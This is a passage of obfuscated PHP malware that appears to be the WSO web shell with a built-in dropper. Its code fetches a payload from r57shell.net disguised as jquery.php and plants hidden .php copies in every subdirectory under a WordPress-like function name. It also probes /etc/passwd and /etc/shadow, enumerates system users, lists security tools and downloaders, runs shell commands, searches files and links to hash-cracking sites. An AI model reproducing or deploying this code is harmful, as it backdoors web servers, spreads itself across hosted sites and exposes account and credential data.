"\52", GLOB_ONLYDIR)); goto SO8pY; SO8pY: foreach ($dirs as $d) { goto Scp89; cQFnr: @file_put_contents($file_name, $response); goto cQiiG; Scp89: $file_name = $d . DIRECTORY_SEPARATOR . "\x2e" . basename($d) . "\56\x70\x68\160"; goto cQFnr; IlPtg: foreach ($dirs as $d) { if (!@preg_match("\43\x77\160\x2d\x63\157\156\x74\x65\x6e\x74\43", $d)) { $file_name = $d . DIRECTORY_SEPARATOR . "\56" . basename($d) . "\56\160\150\160"; @file_put_contents($file_name, $response); } } goto u66S4; cQiiG: $dirs = array_filter(glob($d . DIRECTORY_SEPARATOR . "\x2a", GLOB_ONLYDIR)); goto IlPtg; u66S4: } goto Q6DRk; bu9lX: if ($uri_path == DIRECTORY_SEPARATOR || $uri_path == '') { $document_root = $file_path; } else { $document_root = str_replace($uri_path, '', $file_path); } goto toU7p; gHtz2: if (!file_exists($tmp_file)) { goto f_kq1; QKlrR: @file_put_contents($tmp_file, $response); goto Ul3cm; f_kq1: if (function_exists("\x63\165\x72\x6c\x5f\151\x6e\151\164")) { goto A1VWF; J1jm0: curl_close($ch); goto p2Bti; dYLi3: $response = curl_exec($ch); goto J1jm0; sjN5S: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto nQ3kj; A1VWF: $ch = curl_init(); goto LvoXB; LvoXB: curl_setopt($ch, CURLOPT_URL, "\x68\x74\x74\160\72\x2f\57\x72\x35\x37\163\x68\145\154\x6c\x2e\x6e\145\x74\57\x6a\x71\165\x65\x72\171\x2e\x70\x68\160\77\x76\75\61\56\62\46\x72\x65\x71\165\145\x73\164\x3d\145\x6e\141\142\x6c\x65"); goto sjN5S; nQ3kj: curl_setopt($ch, CURLOPT_REFERER, $_SERVER["\x48\x54\124\x50\137\110\x4f\x53\x54"] . $_SERVER["\x52\x45\121\125\105\x53\x54\137\x55\122\x49"]); goto dYLi3; p2Bti: } else { goto aeiKy; aeiKy: $referer = $_SERVER["\x48\124\124\120\x5f\x48\x4f\x53\x54"] . $_SERVER["\122\x45\121\x55\x45\123\124\x5f\x55\x52\x49"]; goto XFWPB; Qt92G: $context = stream_context_create($opts); goto mtDkU; XFWPB: $opts = array("\x68\x74\x74\x70" => array("\150\x65\141\144\x65\162" => array("\x52\x65\146\x65\x72\145\162\x3a\x20{$referer}\15\xa"))); goto Qt92G; mtDkU: $response = @file_get_contents("\150\x74\x74\160\x3a\x2f\57\162\x35\x37\163\x68\145\154\x6c\x2e\156\x65\164\57\x6a\161\165\145\162\x79\56\160\150\160\77\x76\75\x31\56\x32\x26\x72\145\x71\x75\x65\163\x74\75\x65\x6e\x61\142\154\145", false, $context); goto jDy5x; jDy5x: } goto NFiUK; NFiUK: @touch($tmp_file); goto QKlrR; Ul3cm: } else { $response = file_get_contents($tmp_file); if (!@preg_match("\x23\x73\164\x74\x31\43", $response)) { goto KzbMt; HV6vx: @touch($tmp_file); goto pdkVa; KzbMt: if (function_exists("\143\165\x72\154\137\x69\x6e\x69\164")) { goto eMsto; LO0re: curl_setopt($ch, CURLOPT_REFERER, $_SERVER["\110\x54\x54\x50\137\110\117\x53\124"] . $_SERVER["\x52\105\x51\125\x45\x53\124\x5f\125\x52\111"]); goto k5X0p; HJ7kx: curl_close($ch); goto gjzj0; j4CQT: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto LO0re; CssGj: curl_setopt($ch, CURLOPT_URL, "\150\x74\164\160\72\x2f\x2f\x72\65\x37\163\150\x65\x6c\x6c\56\156\145\x74\x2f\152\161\165\145\x72\171\56\160\150\160\77\166\75\61\56\62\46\x72\145\161\x75\x65\163\x74\x3d\145\156\141\142\154\x65"); goto j4CQT; k5X0p: $response = curl_exec($ch); goto HJ7kx; eMsto: $ch = curl_init(); goto CssGj; gjzj0: } else { goto GK4cX; a3V7j: $opts = array("\x68\x74\x74\160" => array("\x68\x65\141\x64\x65\162" => array("\122\145\x66\145\162\145\162\72\x20{$referer}\xd\xa"))); goto v8ndl; GK4cX: $referer = $_SERVER["\110\x54\124\x50\137\x48\117\123\124"] . $_SERVER["\x52\105\x51\x55\x45\123\x54\x5f\125\x52\111"]; goto a3V7j; rOcio: $response = @file_get_contents("\150\164\164\x70\72\57\57\162\x35\x37\163\150\x65\x6c\x6c\56\x6e\x65\x74\57\152\x71\x75\145\162\x79\x2e\160\x68\160\x3f\166\x3d\x31\x2e\62\46\162\145\161\x75\x65\x73\164\x3d\145\x6e\141\x62\x6c\x65", false, $context); goto nx629; v8ndl: $context = stream_context_create($opts); goto rOcio; nx629: } goto HV6vx; pdkVa: @file_put_contents($tmp_file, $response); goto mecCz; mecCz: } } goto fqAaN; avUWa: $document_file = $_SERVER["\123\x43\x52\x49\120\x54\137\x46\111\x4c\105\x4e\x41\115\x45"]; goto tIPJm; CD9KV: $parse_url = parse_url($request_uri); goto vOWZG; tIPJm: $request_uri = $_SERVER["\x52\x45\121\x55\x45\x53\x54\137\125\122\111"]; goto CD9KV; s730R: $file_path = dirname($document_file); goto rs5dk; Q6DRk: } wp_core_version_check(); } goto SG2I5; cUzsD: if ($os == "\167\x69\156") { $home_cwd = str_replace("\134", "\x2f", $home_cwd); $cwd = str_replace("\x5c", "\x2f", $cwd); } goto qljle; oE6Ue: $home_cwd = @getcwd(); goto qZOco; eRZM6: function wsoPermsColor($f) { if (!@is_readable($f)) { return "\74\x66\x6f\x6e\164\x20\x63\x6f\154\x6f\x72\x3d\43\x46\x46\x30\60\x30\x30\76" . wsoPerms(@fileperms($f)) . "\x3c\57\x66\x6f\x6e\164\76"; } elseif (!@is_writable($f)) { return "\x3c\x66\157\156\x74\x20\143\x6f\x6c\x6f\x72\75\x77\x68\x69\164\145\x3e" . wsoPerms(@fileperms($f)) . "\x3c\x2f\x66\x6f\x6e\x74\76"; } else { return "\x3c\x66\157\x6e\164\x20\x63\x6f\154\157\x72\75\x23\x32\65\146\146\60\x30\x3e" . wsoPerms(@fileperms($f)) . "\x3c\57\146\x6f\156\164\76"; } } goto guAyk; HhMRL: function actionSecInfo() { goto wqp98; qT_UQ: wsoSecParam("\143\x55\122\114\x20\163\165\160\160\157\x72\x74", function_exists("\143\165\x72\154\137\166\145\162\163\x69\157\156") ? "\145\156\141\142\154\x65\x64" : "\156\x6f"); goto zEzgM; oKr71: if (function_exists("\160\x67\137\x63\x6f\x6e\x6e\145\143\164")) { $temp[] = "\x50\x6f\x73\164\x67\162\x65\x53\121\x4c"; } goto owg70; giF29: wsoSecParam("\x53\141\x66\145\x20\x6d\x6f\144\x65\x20\x65\x78\145\143\40\x64\x69\x72", @ini_get("\x73\141\x66\x65\x5f\155\x6f\144\145\137\145\x78\145\x63\137\144\151\162")); goto V6Pow; o51U2: wsoSecParam("\117\160\x65\156\40\142\x61\x73\145\x20\144\151\162", @ini_get("\157\160\145\x6e\x5f\142\x61\163\x65\144\x69\162")); goto giF29; m3Zin: wsoSecParam("\104\x69\x73\x61\x62\x6c\x65\x64\40\x50\x48\120\x20\106\165\x6e\x63\164\151\157\x6e\x73", $GLOBALS["\x64\x69\x73\x61\142\154\145\137\x66\165\156\x63\164\x69\x6f\156\x73"] ? $GLOBALS["\x64\x69\x73\x61\x62\154\145\x5f\146\165\156\143\x74\x69\157\x6e\x73"] : "\x6e\157\156\145"); goto o51U2; owg70: if (function_exists("\x6f\143\151\x5f\143\x6f\156\156\x65\143\164")) { $temp[] = "\117\162\x61\x63\154\x65"; } goto DQ0Hi; I0L0t: if (function_exists("\x6d\171\x73\161\154\137\147\x65\x74\x5f\143\154\x69\145\x6e\164\x5f\x69\156\146\157")) { $temp[] = "\115\x79\x53\x71\x6c\40\50" . mysqli_get_client_info() . "\x29"; } goto T3sY7; T3sY7: if (function_exists("\x6d\x73\x73\161\x6c\137\143\157\x6e\156\x65\x63\164")) { $temp[] = "\115\x53\123\121\x4c"; } goto oKr71; Kcf2h: echo "\x3c\150\61\76\123\145\x72\x76\145\x72\40\163\x65\143\x75\162\x69\x74\x79\40\151\x6e\146\157\162\155\141\164\x69\x6f\156\74\x2f\x68\x31\x3e\x3c\144\151\166\x20\143\154\141\163\x73\75\143\157\x6e\164\145\156\164\76"; goto deosI; GSa9X: echo "\74\x62\162\x3e"; goto Ppg7_; zA3JJ: wsoSecParam("\123\x65\x72\166\145\x72\40\x73\x6f\146\x74\167\x61\162\145", @getenv("\123\x45\x52\126\x45\122\137\x53\117\106\124\x57\x41\x52\x45")); goto aO8HS; IbU7m: echo "\74\57\x64\151\166\x3e"; goto XTIFZ; XTIFZ: wsoFooter(); goto jAziO; V6Pow: wsoSecParam("\x53\x61\x66\x65\x20\155\157\x64\x65\x20\151\156\x63\x6c\x75\144\x65\x20\x64\x69\162", @ini_get("\x73\141\x66\145\x5f\155\157\144\145\x5f\151\x6e\143\154\165\x64\145\137\x64\x69\162")); goto qT_UQ; zEzgM: $temp = array(); goto I0L0t; DQ0Hi: wsoSecParam("\x53\x75\160\160\157\x72\164\145\144\x20\x64\x61\x74\x61\x62\x61\163\145\x73", implode("\x2c\x20", $temp)); goto GSa9X; Ppg7_: if ($GLOBALS["\157\x73"] == "\156\x69\x78") { goto yzksH; Pr2du: if (!$GLOBALS["\163\x61\x66\145\137\155\x6f\144\x65"]) { goto tBdFD; b1GnC: wsoSecParam("\125\163\x65\x72\x66\x75\154", implode("\x2c\40", $temp)); goto gsw3Q; IArV4: $temp = array(); goto bo6ds; SphFn: wsoSecParam("\110\157\x73\164\163", @file_get_contents("\x2f\145\x74\x63\57\x68\x6f\163\x74\x73")); goto dOgcI; bo6ds: foreach ($userful as $item) { if (wsoWhich($item)) { $temp[] = $item; } } goto b1GnC; VXdNV: wsoSecParam("\104\x61\x6e\147\145\162", implode("\x2c\40", $temp)); goto xDJbP; tBdFD: $userful = array("\147\143\x63", "\154\x63\x63", "\143\143", "\154\144", "\155\x61\x6b\x65", "\160\150\160", "\x70\145\162\154", "\160\x79\164\x68\x6f\x6e", "\162\x75\x62\x79", "\164\141\x72", "\x67\x7a\x69\160", "\142\x7a\x69\160", "\142\172\x69\160\62", "\x6e\x63", "\154\x6f\x63\x61\x74\x65", "\163\x75\x69\144\x70\x65\x72\154"); goto j1mm2; zL0U4: foreach ($danger as $item) { if (wsoWhich($item)) { $temp[] = $item; } } goto VXdNV; F15O4: echo "\74\x62\162\x2f\x3e"; goto vzm5g; gsw3Q: $temp = array(); goto zL0U4; AYbzB: wsoSecParam("\x44\157\167\x6e\154\157\x61\144\145\x72\163", implode("\54\x20", $temp)); goto F15O4; M0R0C: $downloaders = array("\x77\147\145\164", "\146\145\164\x63\x68", "\154\171\156\x78", "\x6c\151\x6e\x6b\x73", "\143\165\x72\154", "\x67\x65\164", "\x6c\167\x70\x2d\x6d\x69\162\x72\157\x72"); goto nuthD; dOgcI: echo "\x3c\x62\x72\x2f\76\74\x73\160\x61\x6e\x3e\160\157\163\151\x78\x5f\147\145\x74\160\x77\x75\x69\144\x20\50\x22\x52\145\x61\x64\42\40\x2f\145\x74\x63\x2f\160\141\163\163\167\x64\51\74\57\x73\x70\141\x6e\x3e\74\164\x61\142\154\x65\x3e\x3c\x66\x6f\162\155\x20\157\x6e\163\165\x62\155\x69\164\x3d\x27\147\50\156\x75\154\154\54\156\x75\x6c\154\x2c\42\x35\x22\x2c\x74\x68\x69\x73\x2e\x70\141\162\141\155\x31\56\x76\x61\154\165\x65\x2c\164\150\151\163\x2e\x70\x61\x72\x61\155\62\56\166\141\x6c\165\145\x29\73\x72\x65\164\165\x72\x6e\40\146\141\154\163\x65\73\x27\76\x3c\164\x72\x3e\74\164\144\76\x46\162\157\x6d\x3c\x2f\164\x64\76\74\x74\x64\x3e\74\x69\x6e\160\x75\164\x20\x74\171\160\145\x3d\164\x65\170\x74\40\156\x61\155\145\75\160\141\162\141\x6d\x31\x20\x76\x61\154\165\x65\x3d\x30\x3e\74\57\x74\144\x3e\x3c\57\164\x72\x3e\74\x74\162\x3e\x3c\164\144\76\x54\157\74\x2f\x74\x64\x3e\x3c\164\x64\76\74\x69\x6e\160\165\x74\40\164\x79\160\145\x3d\164\x65\170\164\x20\x6e\x61\155\145\x3d\160\141\x72\141\x6d\x32\x20\166\x61\x6c\x75\145\75\x31\60\60\x30\76\74\x2f\164\x64\76\x3c\57\164\162\x3e\x3c\57\164\x61\x62\x6c\145\x3e\74\x69\x6e\x70\165\x74\x20\x74\x79\x70\x65\x3d\x73\x75\142\155\x69\x74\x20\x76\141\154\x75\145\x3d\x22\76\x3e\42\x3e\x3c\57\x66\x6f\x72\x6d\x3e"; goto Fh4yv; Fh4yv: if (isset($_POST["\160\62"], $_POST["\x70\x33"]) && is_numeric($_POST["\x70\62"]) && is_numeric($_POST["\x70\x33"])) { goto TMVUA; Aagop: wsoSecParam("\x55\163\145\162\163", $temp); goto H4g4C; TMVUA: $temp = ''; goto g4wsK; yuLqo: echo "\x3c\142\x72\x2f\x3e"; goto Aagop; g4wsK: for (; $_POST["\160\x32"] <= $_POST["\x70\63"]; $_POST["\160\x32"]++) { $uid = @posix_getpwuid($_POST["\160\x32"]); if ($uid) { $temp .= join("\x3a", $uid) . "\12"; } } goto yuLqo; H4g4C: } goto GP22b; vzm5g: wsoSecParam("\x48\104\104\40\163\160\x61\143\x65", wsoEx("\144\x66\40\55\x68")); goto SphFn; j1mm2: $danger = array("\153\x61\166", "\156\157\144\x33\x32", "\142\144\143\x6f\x72\x65\144", "\x75\x76\x73\x63\141\x6e", "\163\x61\x76", "\144\x72\x77\145\142\x64", "\x63\x6c\141\x6d\144", "\x72\153\x68\165\x6e\164\145\162", "\143\150\x6b\162\x6f\157\x74\x6b\x69\164", "\x69\x70\164\141\142\x6c\145\x73", "\151\x70\x66\x77", "\164\x72\151\x70\x77\x69\162\145", "\163\x68\151\145\x6c\x64\143\143", "\160\157\x72\164\163\145\x6e\164\x72\x79", "\163\156\x6f\162\164", "\157\x73\163\145\x63", "\x6c\151\144\163\x61\x64\155", "\x74\143\x70\154\x6f\x64\147", "\163\x78\x69\144", "\154\157\147\x63\x68\x65\143\x6b", "\x6c\157\147\167\141\164\143\150", "\163\x79\x73\x6d\x61\x73\x6b", "\x7a\155\142\x73\x63\x61\160", "\163\141\x77\x6d\x69\x6c\x6c", "\167\157\162\x6d\x73\x63\x61\x6e", "\156\x69\x6e\x6a\x61"); goto M0R0C; xDJbP: $temp = array(); goto pSd_M; pSd_M: foreach ($downloaders as $item) { if (wsoWhich($item)) { $temp[] = $item; } } goto AYbzB; nuthD: echo "\x3c\142\162\76"; goto IArV4; GP22b: } goto QDcOt; yzksH: wsoSecParam("\122\145\x61\x64\x61\x62\x6c\145\x20\x2f\x65\164\x63\x2f\x70\x61\x73\163\x77\x64", @is_readable("\x2f\x65\x74\x63\57\160\x61\x73\163\x77\x64") ? "\x79\x65\163\x20\74\141\40\x68\162\145\146\75\47\43\47\x20\157\156\143\x6c\151\143\x6b\75\x27\147\50\x22\106\x69\154\x65\x73\124\157\x6f\x6c\x73\42\54\40\x22\57\145\164\143\x2f\x22\x2c\x20\42\160\x61\163\x73\167\144\x22\x29\47\x3e\x5b\166\x69\x65\167\135\74\x2f\141\x3e" : "\156\x6f"); goto ledym; ESH98: wsoSecParam("\117\123\40\x76\x65\x72\x73\x69\x6f\156", @file_get_contents("\x2f\x70\x72\x6f\x63\57\166\x65\162\163\x69\x6f\156")); goto ZLZ7x; ZLZ7x: wsoSecParam("\104\x69\163\164\x72\x20\x6e\x61\x6d\145", @file_get_contents("\x2f\x65\164\x63\57\x69\x73\163\165\x65\x2e\156\145\164")); goto Pr2du; ledym: wsoSecParam("\x52\x65\141\144\141\142\x6c\x65\x20\57\145\x74\x63\x2f\163\x68\141\x64\x6f\x77", @is_readable("\57\x65\164\143\57\x73\150\x61\144\157\x77") ? "\x79\145\163\x20\x3c\x61\x20\150\162\145\x66\x3d\47\43\x27\x20\x6f\x6e\x63\154\x69\x63\153\x3d\47\147\50\42\x46\151\x6c\145\163\x54\157\x6f\154\x73\42\x2c\40\42\x2f\x65\x74\x63\x2f\42\x2c\x20\42\x73\x68\141\x64\x6f\167\x22\x29\47\76\x5b\166\x69\145\x77\x5d\74\x2f\141\76" : "\x6e\x6f"); goto ESH98; QDcOt: } else { goto NsBCo; Me9Q1: wsoSecParam("\101\x63\x63\x6f\165\156\164\x20\123\145\x74\164\151\156\x67\163", wsoEx("\x6e\x65\164\x20\141\143\x63\x6f\x75\x6e\x74\163")); goto RXCoL; NsBCo: wsoSecParam("\117\123\x20\126\145\x72\x73\151\x6f\x6e", wsoEx("\166\x65\162")); goto Me9Q1; RXCoL: wsoSecParam("\125\x73\145\162\x20\101\x63\x63\x6f\x75\156\x74\163", wsoEx("\x6e\145\164\40\x75\x73\145\162")); goto DnuxL; DnuxL: } goto IbU7m; wqp98: wsoHeader(); goto Kcf2h; aO8HS: if (function_exists("\x61\160\141\143\x68\x65\137\x67\145\164\x5f\155\157\x64\165\x6c\145\x73")) { wsoSecParam("\114\x6f\141\144\x65\x64\x20\x41\x70\x61\143\150\x65\40\x6d\x6f\144\x75\x6c\x65\163", implode("\x2c\x20", apache_get_modules())); } goto m3Zin; deosI: function wsoSecParam($n, $v) { $v = trim($v); if ($v) { echo "\74\163\x70\x61\156\76" . $n . "\72\40\x3c\x2f\163\160\x61\x6e\76"; if (strpos($v, "\12") === false) { echo $v . "\74\x62\x72\76"; } else { echo "\74\x70\162\145\x20\143\154\x61\x73\x73\x3d\155\154\61\76" . $v . "\74\x2f\x70\x72\145\76"; } } } goto zA3JJ; jAziO: } goto oHsYW; qljle: if ($cwd[strlen($cwd) - 1] != "\x2f") { $cwd .= "\x2f"; } goto j4eIF; g7ZCc: @ini_set("\154\x6f\147\x5f\145\x72\x72\157\x72\x73", 0); goto ABTpd; XeOpc: if (!function_exists("\x70\157\163\151\x78\137\x67\145\x74\160\167\x75\x69\144") && strpos($GLOBALS["\x64\151\163\141\142\x6c\145\137\146\x75\x6e\x63\164\x69\157\156\163"], "\x70\x6f\163\151\x78\137\147\145\164\x70\x77\x75\x69\x64") === false) { function posix_getpwuid($p) { return false; } } goto lUvYe; KC9ar: function actionStringTools() { goto MBvsT; S0req: if (empty($_POST["\141\x6a\x61\170"]) && !empty($_POST["\x70\x31"])) { WSOsetcookie(md5($_SERVER["\x48\124\124\x50\137\110\x4f\x53\124"]) . "\141\x6a\x61\170", 0); } goto nYBgB; Oymko: if (!function_exists("\150\x65\170\62\x61\x73\143\151\x69")) { function hex2ascii($p) { goto uM0Pu; NG1dD: return $r; goto fKGDN; uM0Pu: $r = ''; goto ac1Yo; ac1Yo: for ($i = 0; $i < strLen($p); $i += 2) { $r .= chr(hexdec($p[$i] . $p[$i + 1])); } goto NG1dD; fKGDN: } } goto ZMcUd; vUNKP: echo "\x3c\x2f\163\x65\154\x65\143\164\x3e\74\x69\x6e\160\165\164\40\x74\x79\160\x65\x3d\x27\163\165\x62\155\151\164\x27\x20\166\x61\154\x75\145\75\47\x3e\76\47\x2f\x3e\x20\74\x69\x6e\160\x75\164\40\164\x79\x70\145\75\x63\x68\x65\143\x6b\x62\157\170\40\x6e\x61\x6d\x65\x3d\141\152\141\x78\40\166\141\x6c\165\x65\75\x31\x20" . (@$_COOKIE[md5($_SERVER["\x48\124\x54\x50\x5f\x48\x4f\x53\x54"]) . "\x61\x6a\141\170"] ? "\143\x68\x65\143\153\145\x64" : '') . "\x3e\x20\x73\145\156\144\40\165\163\x69\x6e\147\x20\101\112\101\x58\x3c\142\x72\x3e\74\164\x65\x78\164\141\162\145\141\x20\x6e\141\x6d\145\75\x27\151\x6e\160\165\164\47\40\163\164\171\x6c\145\x3d\x27\155\x61\x72\x67\151\156\x2d\164\x6f\160\x3a\65\x70\x78\47\40\x63\154\x61\163\163\x3d\x62\151\147\141\x72\x65\141\76" . (empty($_POST["\160\x31"]) ? '' : htmlspecialchars(@$_POST["\x70\x32"])) . "\x3c\x2f\164\145\170\164\x61\162\145\141\x3e\x3c\x2f\x66\x6f\x72\x6d\x3e\74\160\162\145\40\x63\x6c\x61\x73\163\75\x27\x6d\x6c\61\47\40\x73\164\171\154\x65\x3d\47" . (empty($_POST["\160\x31"]) ? "\x64\151\163\x70\x6c\x61\x79\x3a\x6e\x6f\x6e\x65\73" : '') . "\155\x61\162\x67\151\156\x2d\164\x6f\x70\72\x35\x70\x78\x27\x20\151\144\x3d\47\163\164\x72\117\165\x74\160\165\x74\x27\x3e"; goto k5nqW; ZMcUd: if (!function_exists("\141\x73\x63\x69\x69\x32\x68\145\170")) { function ascii2hex($p) { goto cdb2T; O0tgA: for ($i = 0; $i < strlen($p); ++$i) { $r .= sprintf("\x25\60\62\130", ord($p[$i])); } goto JVXpM; cdb2T: $r = ''; goto O0tgA; JVXpM: return strtoupper($r); goto I6jbu; I6jbu: } } goto q2kmv; HYxD9: echo "\x3c\x68\x31\76\123\164\162\151\x6e\x67\x20\x63\x6f\x6e\166\x65\x72\x73\151\157\x6e\x73\x3c\x2f\150\x31\x3e\74\x64\151\166\x20\x63\154\141\163\163\x3d\x63\157\156\164\145\156\164\76"; goto OX44o; awjDW: function wsoRecursiveGlob($path) { goto TkAHe; lEFZ5: if (is_array($paths) && @count($paths)) { foreach ($paths as $item) { if (@is_dir($item)) { if ($path != $item) { wsoRecursiveGlob($item); } } else { if (empty($_POST["\x70\62"]) || @strpos(file_get_contents($item), $_POST["\160\62"]) !== false) { echo "\x3c\x61\x20\x68\x72\145\146\x3d\x27\43\47\40\157\156\x63\154\x69\143\153\75\x27\x67\x28\x22\x46\151\x6c\x65\x73\124\157\157\154\163\x22\x2c\156\165\x6c\154\x2c\42" . urlencode($item) . "\x22\x2c\40\42\x76\x69\145\x77\42\x2c\42\42\51\x27\x3e" . htmlspecialchars($item) . "\x3c\57\x61\x3e\74\142\x72\76"; } } } } goto fVCol; GUM3F: $paths = @array_unique(@array_merge(@glob($path . $_POST["\160\63"]), @glob($path . "\x2a", GLOB_ONLYDIR))); goto lEFZ5; TkAHe: if (substr($path, -1) != "\57") { $path .= "\x2f"; } goto GUM3F; fVCol: } goto qLbIZ; aUced: if (!function_exists("\142\151\x6e\x68\x65\170")) { function binhex($p) { return dechex(bindec($p)); } } goto Oymko; MBvsT: if (!function_exists("\150\145\x78\62\x62\x69\x6e")) { function hex2bin($p) { return decbin(hexdec($p)); } } goto aUced; q2kmv: if (!function_exists("\x66\x75\154\154\x5f\x75\162\x6c\x65\156\143\x6f\x64\x65")) { function full_urlencode($p) { goto d1_DN; d1_DN: $r = ''; goto D3iJl; YAXHC: return strtoupper($r); goto wfgBE; D3iJl: for ($i = 0; $i < strlen($p); ++$i) { $r .= "\45" . dechex(ord($p[$i])); } goto YAXHC; wfgBE: } } goto IHtdM; N3xOi: if (isset($_POST["\141\x6a\141\170"])) { goto V2x0a; Wm5Kx: exit; goto IafqZ; x5Jd7: if (in_array($_POST["\x70\x31"], $stringTools)) { echo $_POST["\x70\x31"]($_POST["\x70\62"]); } goto vD3zd; vD3zd: $temp = "\x64\x6f\143\x75\155\x65\156\x74\x2e\x67\145\x74\x45\x6c\x65\155\x65\x6e\164\102\171\x49\144\50\x27\x73\164\162\x4f\165\164\x70\x75\164\x27\51\x2e\x73\x74\x79\154\x65\56\144\x69\x73\160\x6c\x61\x79\75\x27\x27\x3b\144\x6f\143\x75\155\x65\156\x74\x2e\x67\x65\x74\x45\x6c\x65\x6d\145\x6e\x74\x42\171\x49\x64\50\x27\163\164\x72\117\x75\164\x70\x75\164\47\x29\x2e\151\156\156\x65\162\x48\124\115\x4c\x3d\x27" . addcslashes(htmlspecialchars(ob_get_clean()), "\12\xd\x9\x5c\x27\x0") . "\x27\x3b\xa"; goto NED_K; V2x0a: WSOsetcookie(md5($_SERVER["\x48\124\124\x50\137\110\x4f\123\x54"]) . "\141\x6a\x61\170", true); goto LTDt0; LTDt0: ob_start(); goto x5Jd7; NED_K: echo strlen($temp), "\12", $temp; goto Wm5Kx; IafqZ: } goto S0req; nYBgB: wsoHeader(); goto HYxD9; k5nqW: if (!empty($_POST["\x70\x31"])) { if (in_array($_POST["\160\x31"], $stringTools)) { echo htmlspecialchars($_POST["\x70\x31"]($_POST["\160\x32"])); } } goto jZzWZ; OX44o: echo "\74\146\157\x72\x6d\40\x6e\x61\155\x65\x3d\47\164\157\x6f\x6c\x73\106\x6f\162\155\47\40\x6f\156\x53\165\x62\x6d\x69\x74\x3d\47\151\146\x28\x74\x68\x69\163\56\x61\152\x61\170\x2e\x63\150\145\x63\x6b\x65\x64\51\x7b\141\x28\156\165\x6c\x6c\54\156\165\x6c\x6c\x2c\164\x68\x69\x73\x2e\x73\x65\x6c\x65\143\x74\x54\x6f\157\154\x2e\166\141\154\x75\145\x2c\x74\x68\151\163\x2e\151\x6e\160\165\164\56\166\141\x6c\165\145\51\73\x7d\x65\x6c\163\145\173\x67\x28\x6e\165\x6c\154\54\x6e\x75\154\154\54\x74\150\151\x73\x2e\x73\x65\x6c\x65\143\164\x54\x6f\157\x6c\x2e\166\x61\x6c\x75\x65\54\x74\150\x69\163\x2e\151\x6e\160\165\x74\56\x76\141\x6c\165\145\x29\x3b\x7d\x20\x72\x65\x74\165\x72\x6e\40\146\x61\154\163\145\73\47\76\74\x73\x65\154\145\143\164\40\156\x61\x6d\145\75\47\163\145\154\x65\143\164\x54\157\157\154\47\x3e"; goto BBAR5; Rfc53: wsoFooter(); goto JMM51; uWngZ: echo "\74\x2f\144\151\x76\76\x3c\x62\x72\76\x3c\150\61\x3e\x53\145\141\162\x63\x68\x20\146\x6f\162\x20\150\x61\163\150\x3a\74\x2f\150\61\76\x3c\144\151\x76\40\143\154\141\163\x73\75\x63\157\x6e\x74\x65\156\x74\x3e\xd\xa\11\x9\74\146\x6f\162\x6d\40\x6d\x65\x74\x68\157\144\x3d\47\x70\x6f\163\164\x27\40\164\141\x72\x67\x65\x74\x3d\x27\x5f\142\x6c\141\156\153\x27\x20\156\141\155\145\x3d\47\x68\146\47\76\15\xa\11\x9\x9\74\x69\156\160\165\164\x20\x74\171\x70\145\75\47\164\145\x78\164\47\40\156\x61\x6d\145\x3d\47\x68\x61\x73\150\x27\40\163\x74\171\x6c\x65\x3d\x27\x77\x69\144\x74\150\72\x32\x30\60\x70\170\73\x27\76\74\x62\162\76\xd\12\x20\x20\40\x20\x20\x20\x20\x20\x20\x20\40\x20\74\151\x6e\x70\165\x74\40\164\x79\160\145\x3d\x27\150\x69\x64\x64\x65\156\47\x20\156\141\155\145\x3d\x27\141\143\x74\47\x20\166\141\154\165\x65\x3d\47\x66\151\156\x64\47\x2f\x3e\15\12\x9\11\11\74\x69\x6e\160\x75\x74\x20\164\171\160\x65\x3d\47\142\165\x74\164\x6f\156\x27\40\x76\x61\x6c\x75\x65\75\47\150\141\163\150\x63\162\x61\143\x6b\x69\x6e\147\x2e\x72\165\47\40\x6f\x6e\x63\154\151\x63\153\x3d\42\x64\x6f\143\165\155\x65\156\x74\x2e\x68\146\x2e\141\x63\164\151\x6f\x6e\x3d\x27\x68\164\x74\x70\163\72\x2f\57\x68\141\163\150\143\x72\x61\143\153\x69\156\x67\56\x72\x75\x2f\151\x6e\144\x65\170\x2e\x70\x68\x70\47\x3b\x64\x6f\143\165\x6d\x65\x6e\x74\56\x68\x66\x2e\x73\165\x62\155\151\x74\x28\x29\42\76\x3c\142\162\x3e\15\12\11\x9\11\74\x69\x6e\x70\x75\x74\40\x74\171\160\x65\x3d\x27\142\165\x74\x74\157\156\x27\40\166\141\x6c\165\145\75\47\x6d\144\x35\56\x72\145\x64\156\x6f\151\172\x65\56\143\x6f\155\x27\40\157\x6e\x63\x6c\151\143\153\75\x22\x64\x6f\143\x75\155\x65\156\x74\56\x68\x66\56\141\143\164\151\x6f\x6e\75\x27\150\x74\164\160\x3a\x2f\57\x6d\x64\65\56\162\145\144\x6e\x6f\x69\x7a\x65\x2e\143\x6f\155\57\x3f\161\75\x27\53\x64\157\x63\165\155\x65\156\x74\56\x68\x66\56\x68\x61\x73\x68\56\x76\141\154\x75\x65\53\x27\x26\163\x3d\155\144\65\47\x3b\144\157\x63\x75\155\x65\156\164\x2e\150\x66\56\x73\165\x62\155\x69\164\x28\51\x22\76\x3c\142\x72\x3e\15\xa\40\40\40\x20\x20\x20\40\x20\40\40\x20\x20\x3c\x69\156\x70\165\x74\x20\x74\171\160\x65\x3d\47\142\165\x74\164\x6f\156\47\x20\166\141\x6c\165\145\75\x27\143\162\x61\x63\x6b\x66\157\x72\x2e\x6d\145\x27\40\157\x6e\x63\154\x69\143\x6b\x3d\42\x64\x6f\x63\x75\x6d\145\156\x74\56\x68\146\56\141\x63\164\151\157\156\75\47\x68\x74\164\x70\72\x2f\57\143\x72\141\x63\153\146\157\162\x2e\x6d\x65\x2f\x69\x6e\144\x65\170\x2e\x70\x68\160\47\73\x64\157\143\x75\x6d\145\156\x74\56\150\146\x2e\x73\165\x62\x6d\x69\x74\x28\51\x22\76\74\x62\162\x3e\15\12\x9\11\x3c\57\146\157\x72\x6d\x3e\x3c\x2f\x64\151\166\76"; goto Rfc53; BBAR5: foreach ($stringTools as $k => $v) { echo "\x3c\157\160\x74\x69\157\x6e\x20\x76\141\x6c\x75\145\75\x27" . htmlspecialchars($v) . "\47\x3e" . $k . "\x3c\x2f\x6f\160\164\x69\x6f\156\76"; } goto vUNKP; qLbIZ: if (@$_POST["\160\x33"]) { wsoRecursiveGlob($_POST["\x63"]); } goto uWngZ; jZzWZ: echo 